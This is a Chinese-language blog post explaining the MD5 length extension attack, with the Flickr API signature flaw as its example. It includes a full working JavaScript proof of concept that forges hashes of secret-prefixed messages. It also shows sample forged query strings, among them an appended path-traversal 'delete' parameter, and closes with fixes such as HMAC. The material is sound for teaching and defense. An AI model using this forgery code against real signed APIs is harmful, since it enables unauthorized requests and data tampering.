Chinaunix首页 | 论坛 | 博客

aullik5的ChinaUnix博客

首页 |  博文目录 |  关于我

aullik5

  • 博客访问: 1172889
  • 博文数量: 272
  • 博客积分: 3899
  • 博客等级: 中校
  • 技术积分: 4734
  • 用 户 组: 普通用户
  • 注册时间: 2012-06-15 14:53
文章分类

全部博文(272)

文章存档

2012年(272)

我的朋友
最近访客
推荐博文
相关博文
Understanding MD5 Length Extension Attack

分类: 网络与安全

2012-06-27 14:59:24

背景

    2009年, 不仅仅发布了ASP.NETpadding oracle攻击,同时还写了一篇关于,和padding oraclepaper放在一起。因为Flickr API签名的这个漏洞,也是需要用到padding的。

    两年过去了,在安全圈子(国内国外)里大家的眼光似乎都只放到了padding oracle上,而有意无意的忽略了Flickr API签名这个问题。我前段时间看paper时,发现Flickr API签名这个漏洞,实际上用的是 MD5 Length Extension Attack,和padding oracle还是很不一样的。在研究了Thai Duong paper后,我发现作者根本就未曾公布MD5 Length Extension Attack 的具体实现方法,只是看到作者突然一下子变魔术一样丢出来了POC

 

 

    注意看红字标注的部分,POCpadding了很多0字节,但是中间又突兀的跑出来了几个非0字节,why

    我百思不得其解,试图还原这个攻击的过程,为此查阅了大量的资料,结果发现整个互联网上,除了一些理论外,根本就没有这个攻击的任何实现。于是一段时间的研究后,我决定写下这篇blog,来填补这一空白。以后哪位哥们的工作要是从本文中得到了启发,记得引用下本文。

 

什么是Length Extension Attack?

    很多哈希算法都存在Length Extension攻击,这是因为这些哈希算法都使用了Merkle–Damgård construction进行数据的压缩,流行算法比如MD5SHA-1等都受影响。

 

    MD5为例,首先算法将消息以512-bit(就是64字节)的长度分组。最后一组必然不足512-bit,这时候算法就会自动往最后一组中填充字节,这个过程被称为padding

 

    Length Extension 是这样的:

    当知道 MD5(secret) 时,在不知道secret的情况下,可以很轻易的推算出 MD5(secret||padding||m')

    在这里m' 是任意数据, || 是连接符,可以为空。padding secret 最后的填充字节。md5padding字节包含整个消息的长度,因此,为了能够准确的计算出padding的值,secret的长度也是我们需要知道的。

 

    所以要实施Length Extension Attack,就需要找到MD5(secret)最后压缩的值,并算出其padding,然后加入到下一轮的MD5压缩算法中去,算出最终我们需要的值。

理解Length Extension Attack

    为了深入理解Length Extension Attack,我们需要深入到MD5的实现中去。而最终的exploit,也需要通过patch MD5来实现。MD5的实现算法可以参考。这个成熟的算法现在已经有了各个语言版本的实现,本身也较为简单。我从网上找了一个javascript版本,并以此为基础实现Length Extension Attack

    首先MD5算法会对消息进行分组,每组64字节,不足64字节的部分用padding补齐。padding的规则是,在最末一个字节之后补充0x80,其余的部分填充为0x00padding最后的8字节用来表示需要哈希的消息长度。

 

    比如输入的消息为:0.46229771920479834 变为ascii码,且将每个字符分离为数组后:

 

    因为数据总共才有19个字节,不足64字节,因此剩下部分需要经过paddingpadding后数据变为了:

 

    最后8字节用以表示数据长度,为 19*8 = 152

 

    在对消息进行分组以及padding后,MD5算法开始依次对每组消息进行压缩,经过64轮数学变换。这个过程中,一开始会有定义好的初始化向量,为4个中间值,初始化向量不是随机生成的,是标准里定义死的,是的,你没看错,这是硬编码!:

 

    然后经过64轮数学变换。

...

 

....

    这是一个for循环,在进行完数学变换后,将改变临时中间值,将这个值进入下一轮for循环:

 

    还记得前面那张MD5结构的图吗?这个FOR循环的过程,就是一次次的压缩过程了。上一次压缩的结果,将作为下一次压缩的输入。Length Extension 的理论基础,就是将已知的压缩后的结果,直接拿过来作为新的压缩输入。在这个过程中,只需要上一次压缩后的结果,而不需要知道原来的消息内容是什么。


实施Length Extension Attack
    理解了Length Extension的原理后,接下来就需要实施这个攻击了。这里有几点需要注意,首先是MD5值怎么还原为压缩函数中需要的4个整数?

    通过逆向MD5算法,不难实现这一点:

 

    简单来说,就是先把MD5值拆分成4组,每组8字节,比如:

9d391442efea4be3666caf8549bd4fd3

    分拆为:

9d391442        efea4be3        666caf85        49bd4fd3

    然后将这几个string转化为整数,再根据一系列的数学变化,还原成FOR循环里面需要用到的 h3,h2,h1,h0

   

    然后将这4个值,加入到MD5的压缩函数中去,并产生出新的值。此时我们就可以在后面附加任意数据了。我们看看这个过程:

    比如secret0.12204316770657897,它只需要经过一轮MD5压缩

    我们从它的MD5值中可以直接还原出这4个中间值,同时我们希望附加消息“axis is smart!”,并计算新消息的MD5值:

 

    通过还原出secret 压缩后的4个中间值后,可以直接进行第二轮附加了消息的压缩,从而在 run times 1 中产生了4个新的中间值,并以此生成新的MD5值。

    为了验证结果是否正确,我们计算一下新的MD5(secret||padding||m')

 可以看到md5值和刚才计算出来的结果是一致的。

    这段代码为:

点击(此处)折叠或打开

  1. <script src="md5.js" ></script>

  3. <script src="md5_le.js" ></script>

  5.  

  7. <script>

  9. function print(str){

  11.   document.write(str);

  13. }

  15.  

  17. print("=== MD5 Length Extension Attack POC ===
    === by axis ===

    "    );

  19.  

  21. // turn this to be true if want to see internal state.

  23. debug = false;

  25.  

  27. var x = String(Math.random());

  29. var append_m = 'axis is smart!';

  31.  

  33. print("[+] secret is :"+x+"
    "    +"[+] length is :" + x.length+"
    "    );

  35. print("[+] message want to append is :"+append_m+"
    "    );

  37.  

  39. print("[+] Start calculating secret's hash
    "    );

  41. var old = faultylabs.MD5(x);

  43. print("
    [+] Calculate secret's md5 hash: "    +old+"
    ");

  45.  

  47. print("

    ================================
    "    );

  49. print("[+] Start calculating new hash
    "    );

  51. print("[+] theory: h(m||p||m1)
    "    );

  53. print("[+] that is: md5_compression_function('"+old+"', 'secret's length', '"+ append_m +"')"+"
    "    );

  55.  

  57. var hash_guess = md5_length_extension(old, x.length, append_m);

  59. print("[+] padding(urlencode format) is: "+ escape(hash_guess['padding']) + "
    "    );

  61. print("
    [+] guessing new hash is: "    +hash_guess['hash']+"
    ");

  63.  

  65.  

  67. print("

    ================================
    "    );

  69. print("[+] now verifying the new hash
    "    ); 

  71. var x1 = '';

  73. x1 = x + hash_guess['padding'] + append_m; 

  75.  

  77. print("[+] new message(urlencode format) is:
    "    + escape(x1) +"

    "    ); 

  79.         

  81. var v = faultylabs.MD5(x1);

  83. print("
    [+] md5 of the new message is: "    +v+"
    ");

  85. </script>

   

    关键代码md5_le.js 是我们patch MD5算法的实现,基于faultylabsMD5实现而来,其源代码见附录。md5.js则是faultylabsmd5实现,在此仅用验证md5值所用。

如何利用Length Extension Attack

    如何利用Length Extension Attack呢?我们知道Length Extension使得我们可以附加任意值在原文之后,并计算出新的哈希。最常见的地方就是签名。

    一个合理的签名,一般是需要salt或者key加上参数值,而salt或者key都是未知的,也就使得我们的原文是未知的。在Flickr API 签名的问题中,Flickr API同时还犯了一个错误,这个错误AmazonAWS签名也犯过。就是签名校验算法中,参数连接时没有使用间隔符。所以本来如:

    ?a=1&b=2&c=3 

    的参数,在签名算法中连接时简单的变成了

    a1b2c3

    那么攻击者可以伪造参数为:

    ?a=1b2c3[....Padding....]&b=4&c=5

    最终在签名算法中连接时:

    a1b2c3[....Padding....]b4c5

    通过length extension可以生成一个新的合法的签名。这是第一种利用方法。

 

    除此之外,因为我们可以附加新的参数,所以任意具有逻辑功能,但原文中未出现过的参数,都可以附加,比如:

    ?a=1&b=2&c=3&delete=../../../file&sig=sig_new

    这是第二种攻击方式。

    第三种攻击方式:还记得HPP

    附带相同的参数可能在不同的环境下造成不同的结果,从而产生一些逻辑漏洞。在普通情况下,可以直接注入新参数,但如果服务端校验了签名,则需要通过length extension伪造一个新的签名才行。

    ?a=1&b=2&c=3&a=4&sig=sig_new

    最后,Length Extension需要知道的length,其实是可以考虑暴力破解的。 

    Length Extension还有什么利用方式?尽情发挥你的想象力吧。

How to Fix?
    MD5SHA-1之类的使用Merkle–Damgård construction的算法是没希望了。

    使用HMAC-SHA1之类的HMAC算法吧,目前HMAC还没有发现过什么安全漏洞。    

    另外针对Flickr API等将参数签名的应用来说,secret放置在 参数末尾也能防止这种攻击。

    比如 MD5(m+secret),希望推导出 MD5(m+secret||padding||m'),结果由于自动附加secret在末尾的关系,会变成

    MD5(m||padding||m'||secret),从而导致Length Extension run不起来。

 

附录

一些参考资料:

~cks/space/blog/programming/HashLengthExtAttack

 md5_le.js源代码:


点击(此处)折叠或打开

  1. md5_length_extension = function(m_md5, m_len, append_m){

  3.   var result = new Array();

  5.  

  7.   if (m_md5.length != 32){

  9.     alert("input error!");

  11.     return false;

  13.   }

  15.   // 将md5值分拆成4组,每组8字节

  17.   var m = new Array();

  19.   for (i=0;i<m_md5.length;i+=8){

  21.     m.push(m_md5.slice(i,i+8));

  23.   }

  25.   // 将md5的4组值还原成压缩函数需要的数值

  27.   var x;

  29.   for(x in m){

  31.     m[x] = ltripzero(m[x]);

  33.     

  35.     // convert string to int ; convert of to_zerofilled_hex()

  37.     m[x] = parseInt(m[x], 16) >> 0;

  39.     

  41.     // convert of int128le_to_hex

  43.     var t=0;

  45.     var ta=0;

  47.     ta = m[x];

  49.     t = (ta & 0xFF);

  51.     ta = ta >>> 8;

  53.     t = t << 8;

  55.     t = t | (ta & 0xFF);

  57.     ta = ta >>> 8;

  59.     t = t << 8;

  61.     t = t | (ta & 0xFF);

  63.     ta = ta >>> 8;

  65.     t = t << 8;

  67.     t = t | ta;

  69.     

  71.     m[x] = t;

  73.   }

  75.   

  77.   // 此时只需要使用MD5压缩函数执行 append_m 以及 append_m的padding即可

  79.   // 此时m 的压缩值已经不再需要,可以用填充字节代替

  81.   var databytes = new Array();

  83.   

  85.   // 初始化,只需要知道 m % 64 的长度即可,事实上可以随意填充,但我们其实还想知道padding

  87.   // 如果消息长度大于64,需要构造之前的等长度的消息,用以后面计算正确的消息长度

  89.   if (m_len>64){

  91.     for (i=0;i<parseInt(m_len/64)*64;i++){

  93.       databytes.push('97'); // 填充任意字节

  95.     }

  97.   }

  99.  

  101.   for (i=0;i<(m_len%64);i++){

  103.     databytes.push('97'); // 填充任意字节

  105.   }

  107.   

  109.   // 调用padding

  111.   databytes = padding(databytes);

  113.   

  115.   // 保存结果为padding,我们也需要这个结果

  117.   result['padding'] = '';

  119.   for (i=(parseInt(m_len/64)*64 + m_len%64);i<databytes.length;i++){

  121.     result['padding'] += String.fromCharCode(databytes[i]);

  123.   }

  125.   

  127.   // 将append_m 转化为数组添加

  129.   for (j=0;j<append_m.length;j++){

  131.     databytes.push(append_m.charCodeAt(j));

  133.   }

  135.   

  137.   // 计算新的padding

  139.   databytes = padding(databytes);

  141.   

  143.   var h0 = m[0];

  145.   var h1 = m[1];

  147.   var h2 = m[2];

  149.   var h3 = m[3];

  151.   

  153.   var a=0,b=0,c=0,d=0;

  155.   // Digest message

  157.   // i=n 开始,因为从 append_b 开始压缩

  159.   for (i = parseInt(m_len/64)+1; i < databytes.length / 64; i++) {

  161.      // initialize run

  163.      a = h0

  165.      b = h1

  167.      c = h2

  169.      d = h3

  171.      var ptr = i * 64

  173.      // do 64 runs

  175.      updateRun(fF(b, c, d), 0xd76aa478, bytes_to_int32(databytes, ptr), 7)

  177.      updateRun(fF(b, c, d), 0xe8c7b756, bytes_to_int32(databytes, ptr + 4), 12)

  179.      updateRun(fF(b, c, d), 0x242070db, bytes_to_int32(databytes, ptr + 8), 17)

  181.      updateRun(fF(b, c, d), 0xc1bdceee, bytes_to_int32(databytes, ptr + 12), 22)

  183.      updateRun(fF(b, c, d), 0xf57c0faf, bytes_to_int32(databytes, ptr + 16), 7)

  185.      updateRun(fF(b, c, d), 0x4787c62a, bytes_to_int32(databytes, ptr + 20), 12)

  187.      updateRun(fF(b, c, d), 0xa8304613, bytes_to_int32(databytes, ptr + 24), 17)

  189.      updateRun(fF(b, c, d), 0xfd469501, bytes_to_int32(databytes, ptr + 28), 22)

  191.      updateRun(fF(b, c, d), 0x698098d8, bytes_to_int32(databytes, ptr + 32), 7)

  193.      updateRun(fF(b, c, d), 0x8b44f7af, bytes_to_int32(databytes, ptr + 36), 12)

  195.      updateRun(fF(b, c, d), 0xffff5bb1, bytes_to_int32(databytes, ptr + 40), 17)

  197.      updateRun(fF(b, c, d), 0x895cd7be, bytes_to_int32(databytes, ptr + 44), 22)

  199.      updateRun(fF(b, c, d), 0x6b901122, bytes_to_int32(databytes, ptr + 48), 7)

  201.      updateRun(fF(b, c, d), 0xfd987193, bytes_to_int32(databytes, ptr + 52), 12)

  203.      updateRun(fF(b, c, d), 0xa679438e, bytes_to_int32(databytes, ptr + 56), 17)

  205.      updateRun(fF(b, c, d), 0x49b40821, bytes_to_int32(databytes, ptr + 60), 22)

  207.      updateRun(fG(b, c, d), 0xf61e2562, bytes_to_int32(databytes, ptr + 4), 5)

  209.      updateRun(fG(b, c, d), 0xc040b340, bytes_to_int32(databytes, ptr + 24), 9)

  211.      updateRun(fG(b, c, d), 0x265e5a51, bytes_to_int32(databytes, ptr + 44), 14)

  213.      updateRun(fG(b, c, d), 0xe9b6c7aa, bytes_to_int32(databytes, ptr), 20)

  215.      updateRun(fG(b, c, d), 0xd62f105d, bytes_to_int32(databytes, ptr + 20), 5)

  217.      updateRun(fG(b, c, d), 0x2441453, bytes_to_int32(databytes, ptr + 40), 9)

  219.      updateRun(fG(b, c, d), 0xd8a1e681, bytes_to_int32(databytes, ptr + 60), 14)

  221.      updateRun(fG(b, c, d), 0xe7d3fbc8, bytes_to_int32(databytes, ptr + 16), 20)

  223.      updateRun(fG(b, c, d), 0x21e1cde6, bytes_to_int32(databytes, ptr + 36), 5)

  225.      updateRun(fG(b, c, d), 0xc33707d6, bytes_to_int32(databytes, ptr + 56), 9)

  227.      updateRun(fG(b, c, d), 0xf4d50d87, bytes_to_int32(databytes, ptr + 12), 14)

  229.      updateRun(fG(b, c, d), 0x455a14ed, bytes_to_int32(databytes, ptr + 32), 20)

  231.      updateRun(fG(b, c, d), 0xa9e3e905, bytes_to_int32(databytes, ptr + 52), 5)

  233.      updateRun(fG(b, c, d), 0xfcefa3f8, bytes_to_int32(databytes, ptr + 8), 9)

  235.      updateRun(fG(b, c, d), 0x676f02d9, bytes_to_int32(databytes, ptr + 28), 14)

  237.      updateRun(fG(b, c, d), 0x8d2a4c8a, bytes_to_int32(databytes, ptr + 48), 20)

  239.      updateRun(fH(b, c, d), 0xfffa3942, bytes_to_int32(databytes, ptr + 20), 4)

  241.      updateRun(fH(b, c, d), 0x8771f681, bytes_to_int32(databytes, ptr + 32), 11)

  243.      updateRun(fH(b, c, d), 0x6d9d6122, bytes_to_int32(databytes, ptr + 44), 16)

  245.      updateRun(fH(b, c, d), 0xfde5380c, bytes_to_int32(databytes, ptr + 56), 23)

  247.      updateRun(fH(b, c, d), 0xa4beea44, bytes_to_int32(databytes, ptr + 4), 4)

  249.      updateRun(fH(b, c, d), 0x4bdecfa9, bytes_to_int32(databytes, ptr + 16), 11)

  251.      updateRun(fH(b, c, d), 0xf6bb4b60, bytes_to_int32(databytes, ptr + 28), 16)

  253.      updateRun(fH(b, c, d), 0xbebfbc70, bytes_to_int32(databytes, ptr + 40), 23)

  255.      updateRun(fH(b, c, d), 0x289b7ec6, bytes_to_int32(databytes, ptr + 52), 4)

  257.      updateRun(fH(b, c, d), 0xeaa127fa, bytes_to_int32(databytes, ptr), 11)

  259.      updateRun(fH(b, c, d), 0xd4ef3085, bytes_to_int32(databytes, ptr + 12), 16)

  261.      updateRun(fH(b, c, d), 0x4881d05, bytes_to_int32(databytes, ptr + 24), 23)

  263.      updateRun(fH(b, c, d), 0xd9d4d039, bytes_to_int32(databytes, ptr + 36), 4)

  265.      updateRun(fH(b, c, d), 0xe6db99e5, bytes_to_int32(databytes, ptr + 48), 11)

  267.      updateRun(fH(b, c, d), 0x1fa27cf8, bytes_to_int32(databytes, ptr + 60), 16)

  269.      updateRun(fH(b, c, d), 0xc4ac5665, bytes_to_int32(databytes, ptr + 8), 23)

  271.      updateRun(fI(b, c, d), 0xf4292244, bytes_to_int32(databytes, ptr), 6)

  273.      updateRun(fI(b, c, d), 0x432aff97, bytes_to_int32(databytes, ptr + 28), 10)

  275.      updateRun(fI(b, c, d), 0xab9423a7, bytes_to_int32(databytes, ptr + 56), 15)

  277.      updateRun(fI(b, c, d), 0xfc93a039, bytes_to_int32(databytes, ptr + 20), 21)

  279.      updateRun(fI(b, c, d), 0x655b59c3, bytes_to_int32(databytes, ptr + 48), 6)

  281.      updateRun(fI(b, c, d), 0x8f0ccc92, bytes_to_int32(databytes, ptr + 12), 10)

  283.      updateRun(fI(b, c, d), 0xffeff47d, bytes_to_int32(databytes, ptr + 40), 15)

  285.      updateRun(fI(b, c, d), 0x85845dd1, bytes_to_int32(databytes, ptr + 4), 21)

  287.      updateRun(fI(b, c, d), 0x6fa87e4f, bytes_to_int32(databytes, ptr + 32), 6)

  289.      updateRun(fI(b, c, d), 0xfe2ce6e0, bytes_to_int32(databytes, ptr + 60), 10)

  291.      updateRun(fI(b, c, d), 0xa3014314, bytes_to_int32(databytes, ptr + 24), 15)

  293.      updateRun(fI(b, c, d), 0x4e0811a1, bytes_to_int32(databytes, ptr + 52), 21)

  295.      updateRun(fI(b, c, d), 0xf7537e82, bytes_to_int32(databytes, ptr + 16), 6)

  297.      updateRun(fI(b, c, d), 0xbd3af235, bytes_to_int32(databytes, ptr + 44), 10)

  299.      updateRun(fI(b, c, d), 0x2ad7d2bb, bytes_to_int32(databytes, ptr + 8), 15)

  301.      updateRun(fI(b, c, d), 0xeb86d391, bytes_to_int32(databytes, ptr + 36), 21)

  303.      // update buffers

  305.      h0 = _add(h0, a)

  307.      h1 = _add(h1, b)

  309.      h2 = _add(h2, c)

  311.      h3 = _add(h3, d)

  313.      

  315.      if (debug == true){

  317.        document.write("run times: "+i+"
    h3: "    +h3+"
    h2: "    +h2+"
    h1: "    +h1+"
    h0: "    +h0+"
    "    )

  319.      }

  321.   }

  323.   

  325.   result['hash'] = int128le_to_hex(h3, h2, h1, h0);

  327.   return result;

  329.     

  331.   // 检测分组后开头是否有0,如果有则去掉

  333.   function ltripzero(str){

  335.     if (str.length != 8) {

  337.       return false;

  339.     }

  341.     

  343.     if (str == "00000000"){

  345.       return str;

  347.     }

  349.     

  351.     var result = '';

  353.     if (str.indexOf('0') == 0 ) {

  355.       var tmp = new Array();

  357.       tmp = str.split('');

  359.       for (i=0;i<8;i++){

  361.         if (tmp[i] != 0){

  363.           for(j=i;j<8;j++){

  365.             result = result + tmp[j];

  367.           }

  369.           break;

  371.         }

  373.       }

  375.       return result;

  377.     }else{

  379.       return str;

  381.     }

  383.   }

  385.   

  387.   // 往数组填充padding

  389.   function padding(databytes){

  391.     if (databytes.constructor != Array) {

  393.       return false;

  395.     }

  397.     // save original length

  399.     var org_len = databytes.length

  401.     // first append the "1" + 7x "0"

  403.     databytes.push(0x80)

  405.     //alert(databytes) // 添加第一个0x80, 然后填充0x00到56位

  407.   

  409.     // determine required amount of padding

  411.     var tail = databytes.length % 64

  413.   

  415.     // no room for msg length?

  417.     if (tail > 56) {

  419.       // pad to next 512 bit block

  421.       for (var i = 0; i < (64 - tail); i++) {

  423.           databytes.push(0x0)

  425.       }

  427.       tail = databytes.length % 64

  429.     }

  431.     for (i = 0; i < (56 - tail); i++) {

  433.       databytes.push(0x0)

  435.     }

  437.         

  439.     // message length in bits mod 512 should now be 448

  441.     // append 64 bit, little-endian original msg length (in *bits*!)

  443.     databytes = databytes.concat(int64_to_bytes(org_len * 8))

  445.   

  447.     return databytes;

  449.   }

  451.  

  453.   

  455.   // md5 压缩需要使用的函数

  457.   // function update partial state for each run

  459.   function updateRun(nf, sin32, dw32, b32) {

  461.       var temp = d

  463.       d = c

  465.       c = b

  467.       //b = b + rol(a + (nf + (sin32 + dw32)), b32)

  469.       b = _add(b,

  471.           rol(

  473.               _add(a,

  475.                   _add(nf, _add(sin32, dw32))

  477.               ), b32

  479.           )

  481.       )

  483.       a = temp

  485.   }

  487.         

  489.   function _add(n1, n2) {

  491.         return 0x0FFFFFFFF & (n1 + n2)

  493.   }

  495.   

  497.   // convert the 4 32-bit buffers to a 128 bit hex string. (Little-endian is assumed)

  499.   function int128le_to_hex(a, b, c, d) {

  501.       var ra = ""

  503.       var t = 0

  505.       var ta = 0

  507.       for (var i = 3; i >= 0; i--) {

  509.           ta = arguments[i]

  511.           t = (ta & 0xFF)

  513.           ta = ta >>> 8

  515.           t = t << 8

  517.           t = t | (ta & 0xFF)

  519.           ta = ta >>> 8

  521.           t = t << 8

  523.           t = t | (ta & 0xFF)

  525.           ta = ta >>> 8

  527.           t = t << 8

  529.           t = t | ta

  531.           ra = ra + to_zerofilled_hex(t)

  533.       }

  535.       return ra

  537.   }

  539.   // convert a 64 bit unsigned number to array of bytes. Little endian

  541.   function int64_to_bytes(num) {

  543.       var retval = []

  545.       for (var i = 0; i < 8; i++) {

  547.           retval.push(num & 0xFF)

  549.           num = num >>> 8

  551.       }

  553.       return retval

  555.   }

  557.   // 32 bit left-rotation

  559.   function rol(num, places) {

  561.       return ((num << places) & 0xFFFFFFFF) | (num >>> (32 - places))

  563.   }

  565.   

  567.   // The 4 MD5 functions

  569.   function fF(b, c, d) {

  571.       return (b & c) | (~b & d)

  573.   }

  575.   function fG(b, c, d) {

  577.       return (d & b) | (~d & c)

  579.   }

  581.   function fH(b, c, d) {

  583.       return b ^ c ^ d

  585.   }

  587.   function fI(b, c, d) {

  589.       return c ^ (b | ~d)

  591.   }

  593.   // pick 4 bytes at specified offset. Little-endian is assumed

  595.   function bytes_to_int32(arr, off) {

  597.       return (arr[off + 3] << 24) | (arr[off + 2] << 16) | (arr[off + 1] << 8) | (arr[off])

  599.   }

  601.   // convert number to (unsigned) 32 bit hex, zero filled string

  603.   function to_zerofilled_hex(n) {

  605.       var t1 = (n >>> 0).toString(16)

  607.       return "00000000".substr(0, 8 - t1.length) + t1

  609.   }

  611.       

  613. }

阅读(10402) | 评论(0) | 转发(0) |
0

上一篇:Flash + 307 Redirect 的妙用

下一篇:关于PHP的is_a()函数执行代码的问题

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6